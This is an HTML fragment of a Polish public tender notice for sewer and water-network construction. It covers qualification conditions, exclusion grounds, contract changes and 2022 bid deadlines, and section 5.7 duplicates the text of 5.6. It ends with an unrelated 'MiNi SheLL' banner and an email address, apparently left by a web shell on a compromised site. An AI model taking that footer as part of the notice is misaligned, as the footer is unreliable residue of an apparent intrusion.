class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu i spełniają określone przez<br/>Zamawiającego warunki udziału w postępowaniu.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają poniższe warunki udziału w postępowaniu:<br/>1) Zdolność do występowania w obrocie gospodarczym - Zamawiający nie stawia warunków w tym zakresie.<br/>2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów,<br/>Zamawiający nie stawia warunków w tym zakresie<br/>3) Sytuacji ekonomicznej lub finansowej<br/>• Zamawiający wymaga, aby Wykonawcy posiadali ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności gospodarczej na kwotę gwarancyjną co najmniej 60.000 zł.<br/>4) Zdolności technicznej lub zawodowej,<br/>a) w zakresie zdolności technicznej – warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje, lub będzie<br/>dysponował osobami zdolnymi do sprawowania samodzielnych funkcji technicznych w budownictwie w zakresie kierowania<br/>robotami budowlanymi, tj.:<br/>• kierownikiem budowy – posiadającym:<br/><br/>ważne na dzień składania ofert uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej<br/>w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych zgodnie z<br/>ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2020 poz. poz.1333) lub odpowiadające im ważne uprawnienia<br/>budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, uprawniające do kierowania robotami<br/>budowlanymi w zakresie wynikającym z przedmiotu niniejszego zamówienia,<br/>Wskazany wyżej wykaz personelu Wykonawcy stanowi jedynie minimalne wymagania dla spełnienia warunku udziału w<br/>postępowaniu.<br/>b) na potwierdzenie zdolności zawodowej Zamawiający wymaga, aby Wykonawcy wykazali, że w okresie 5 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali, co najmniej<br/>2 roboty budowlane, których przedmiotem były roboty budowlane polegające na - budowie lub przebudowie sieci kanalizacji<br/>sanitarnej lub/i wodociągowej, w tym co najmniej jedną robotę budowlaną o wartości min. 60.000,00 zł brutto oraz załączy<br/>dowody potwierdzające, że ww. roboty zostały wykonane należycie, w szczególności, że zostały wykonane zgodnie z<br/>przepisami prawa budowlanego i prawidłowo ukończone <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający wykluczy z<br/>postępowania o udzielenie zamówienia, na podstawie art. 108 ust. 1 PZP, wykonawcę:<br/>1) będącego osobą fizyczną, którego prawomocnie skazano za przestępstwo:<br/>a) udziału w zorganizowanej grupie przestępczej albo związku mającym na celu popełnienie przestępstwa lub przestępstwa<br/>skarbowego, o którym mowa w art. 258 KK,<br/>b) handlu ludźmi, o którym mowa w art. 189a KK,<br/>c) o którym mowa w art. 228–230a, art. 250a KK lub w art. 46 lub art. 48 ustawy z<br/>25.6.2010r. o sporcie,<br/>d) finansowania przestępstwa o charakterze terrorystycznym, o którym mowa w art. 165a KK, lub przestępstwo udaremniania lub<br/>utrudniania stwierdzenia przestępnego pochodzenia pieniędzy lub ukrywania ich pochodzenia, o którym mowa w art. 299 KK,<br/>e) o charakterze terrorystycznym, o którym mowa w art. 115 § 20 KK, lub mające na celu popełnienie tego przestępstwa,<br/>f) powierzenia wykonywania pracy małoletniemu cudzoziemcowi cudzoziemców, o którym mowa w art. 9 ust. 2 ustawy z 15.6.2012 r.<br/>o skutkach powierzania wykonywania pracy cudzoziemcom przebywającym wbrew przepisom na terytorium<br/>Rzeczypospolitej Polskiej (Dz.U. poz. 769),<br/>g) przeciwko obrotowi gospodarczemu, o których mowa w art. 296–307 KK, przestępstwo oszustwa, o którym mowa w art. 286 KK,<br/>przestępstwo przeciwko wiarygodności dokumentów, o których mowa w art. 270–277d KK, lub przestępstwo skarbowe,<br/>h) o którym mowa w art. 9 ust. 1 i 3 lub art. 10 ustawy z 15.6.2012 r. o skutkach powierzania wykonywania pracy cudzoziemcom<br/>przebywającym wbrew przepisom na terytorium Rzeczypospolitej Polskiej – lub za odpowiedni czyn zabroniony określony w<br/>przepisach prawa obcego;<br/>2. jeżeli urzędującego członka jego organu zarządzającego lub nadzorczego, wspólnika spółki w spółce jawnej lub partnerskiej albo<br/>komplementariusza w spółce komandytowej lub komandytowo-akcyjnej lub prokurenta prawomocnie skazano za przestępstwo, o<br/>którym mowa w pkt 1;<br/>3. wobec którego wydano prawomocny wyrok sądu lub ostateczną decyzję administracyjną o zaleganiu z uiszczeniem podatków,<br/>opłat lub składek na ubezpieczenie społeczne lub zdrowotne, chyba że wykonawca odpowiednio przed upływem terminu do<br/>składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert dokonał płatności<br/>należnych podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł<br/>wiążące porozumienie w sprawie spłaty tych należności;<br/>4. wobec którego orzeczono zakaz ubiegania się o zamówienia publiczne;<br/>5. jeżeli zamawiający może stwierdzić, na podstawie wiarygodnych przesłanek, że wykonawca zawarł z innymi wykonawcami<br/>porozumienie mające na celu zakłócenie konkurencji, w szczególności, jeżeli należąc do tej samej grupy kapitałowej w rozumieniu<br/>ustawy z 16.2.2007 r. o ochronie konkurencji i konsumentów, złożyli odrębne oferty, oferty częściowe lub wnioski o dopuszczenie do<br/>udziału w postępowaniu, chyba że wykażą, że przygotowali te oferty lub wnioski niezależnie od siebie;<br/>6. jeżeli, w przypadkach, o których mowa w art. 85 ust. 1 PZP, doszło do zakłócenia konkurencji wynikającego z wcześniejszego<br/>zaangażowania tego wykonawcy lub podmiotu, który należy z wykonawcą do tej samej grupy kapitałowej w rozumieniu ustawy z<br/>16.2.2007 r. o ochronie konkurencji i konsumentów, chyba że spowodowane tym zakłócenie konkurencji może być wyeliminowane w<br/>inny sposób niż przez wykluczenie wykonawcy z udziału w postępowaniu o udzielenie zamówienia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zamawiający wykluczy z<br/>postępowania o udzielenie zamówienia, na podstawie art. 108 ust. 1 PZP, wykonawcę:<br/>1) będącego osobą fizyczną, którego prawomocnie skazano za przestępstwo:<br/>a) udziału w zorganizowanej grupie przestępczej albo związku mającym na celu popełnienie przestępstwa lub przestępstwa<br/>skarbowego, o którym mowa w art. 258 KK,<br/>b) handlu ludźmi, o którym mowa w art. 189a KK,<br/>c) o którym mowa w art. 228–230a, art. 250a KK lub w art. 46 lub art. 48 ustawy z<br/>25.6.2010r. o sporcie,<br/>d) finansowania przestępstwa o charakterze terrorystycznym, o którym mowa w art. 165a KK, lub przestępstwo udaremniania lub<br/>utrudniania stwierdzenia przestępnego pochodzenia pieniędzy lub ukrywania ich pochodzenia, o którym mowa w art. 299 KK,<br/>e) o charakterze terrorystycznym, o którym mowa w art. 115 § 20 KK, lub mające na celu popełnienie tego przestępstwa,<br/>f) powierzenia wykonywania pracy małoletniemu cudzoziemcowi cudzoziemców, o którym mowa w art. 9 ust. 2 ustawy z 15.6.2012 r.<br/>o skutkach powierzania wykonywania pracy cudzoziemcom przebywającym wbrew przepisom na terytorium<br/>Rzeczypospolitej Polskiej (Dz.U. poz. 769),<br/>g) przeciwko obrotowi gospodarczemu, o których mowa w art. 296–307 KK, przestępstwo oszustwa, o którym mowa w art. 286 KK,<br/>przestępstwo przeciwko wiarygodności dokumentów, o których mowa w art. 270–277d KK, lub przestępstwo skarbowe,<br/>h) o którym mowa w art. 9 ust. 1 i 3 lub art. 10 ustawy z 15.6.2012 r. o skutkach powierzania wykonywania pracy cudzoziemcom<br/>przebywającym wbrew przepisom na terytorium Rzeczypospolitej Polskiej – lub za odpowiedni czyn zabroniony określony w<br/>przepisach prawa obcego;<br/>2. jeżeli urzędującego członka jego organu zarządzającego lub nadzorczego, wspólnika spółki w spółce jawnej lub partnerskiej albo<br/>komplementariusza w spółce komandytowej lub komandytowo-akcyjnej lub prokurenta prawomocnie skazano za przestępstwo, o<br/>którym mowa w pkt 1;<br/>3. wobec którego wydano prawomocny wyrok sądu lub ostateczną decyzję administracyjną o zaleganiu z uiszczeniem podatków,<br/>opłat lub składek na ubezpieczenie społeczne lub zdrowotne, chyba że wykonawca odpowiednio przed upływem terminu do<br/>składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert dokonał płatności<br/>należnych podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł<br/>wiążące porozumienie w sprawie spłaty tych należności;<br/>4. wobec którego orzeczono zakaz ubiegania się o zamówienia publiczne;<br/>5. jeżeli zamawiający może stwierdzić, na podstawie wiarygodnych przesłanek, że wykonawca zawarł z innymi wykonawcami<br/>porozumienie mające na celu zakłócenie konkurencji, w szczególności, jeżeli należąc do tej samej grupy kapitałowej w rozumieniu<br/>ustawy z 16.2.2007 r. o ochronie konkurencji i konsumentów, złożyli odrębne oferty, oferty częściowe lub wnioski o dopuszczenie do<br/>udziału w postępowaniu, chyba że wykażą, że przygotowali te oferty lub wnioski niezależnie od siebie;<br/>6. jeżeli, w przypadkach, o których mowa w art. 85 ust. 1 PZP, doszło do zakłócenia konkurencji wynikającego z wcześniejszego<br/>zaangażowania tego wykonawcy lub podmiotu, który należy z wykonawcą do tej samej grupy kapitałowej w rozumieniu ustawy z<br/>16.2.2007 r. o ochronie konkurencji i konsumentów, chyba że spowodowane tym zakłócenie konkurencji może być wyeliminowane w<br/>inny sposób niż przez wykluczenie wykonawcy z udziału w postępowaniu o udzielenie zamówienia.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 2. Przepisy ustawy dotyczące Wykonawcy stosuje się<br/>odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia. W przypadku wspólnego ubiegania się o<br/>udzielenie zamówienia publicznego: 1) oświadczenia, o których mowa w pkt. XV.3 składa każdy z wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia,<br/>3. . W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenia, o których mowa w ust. 3,<br/>składają każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału<br/>w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. W przypadku polegania przez Wykonawcę na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>Wykonawca przedstawia, wraz z oświadczeniem, o którym mowa w ust. 3, także oświadczenie podmiotu udostępniającego<br/>zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>5. Zamawiający żąda wskazania w ofercie części zamówienia, których wykonanie Wykonawca zamierza powierzyć<br/>podwykonawcom oraz podania nazw ewentualnych podwykonawców, o ile są już znani.<br/>6. Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (t.j. w formie<br/>elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym).<br/>7. Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictw sporządzonych uprzednio w formie pisemnej, w<br/>formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. Prawo o<br/>notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez<br/>opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem<br/>zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez<br/>upełnomocnionego <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> strony dopuszczają<br/>możliwość wprowadzania zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w<br/>przypadku wystąpienia którejkolwiek z następujących okoliczności:<br/>1) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia<br/>okoliczności siły wyższej,<br/>2) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku skierowania przez<br/>Zamawiającego do Wykonawcy pisemnego żądania wstrzymania robót budowlanych, o ile żądanie lub wydanie zakazu nie<br/>nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność,<br/>3) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia kolizji z<br/>instalacjami wewnętrznymi nieujawnionymi w dokumentacji projektowej, lub innymi robotami prowadzonymi przez innego<br/>wykonawcę,<br/>4) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia<br/>konieczności wprowadzenia w dokumentacji projektowej zmian, powodujących wstrzymanie lub przerwanie robót<br/>budowlanych, stanowiących przedmiot zamówienia,<br/>5) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia<br/>warunków geologicznych lub hydrologicznych odmiennych od założonych w dokumentacji projektowej<br/>6) zmiany sposobu rozliczania Umowy lub dokonywania płatności na rzecz Wykonawcy wskutek zaistnienia przyczyn<br/>organizacyjnych lub finansowych leżących po stronie Zamawiającego, w tym na skutek zawartej przez Zamawiającego<br/>umowy o dofinansowanie zadania.<br/>2. Wszelkie zmiany umowy wymagają pod rygorem nieważności formy pisemnej<br/>i podpisania przez obydwie strony umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-16 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com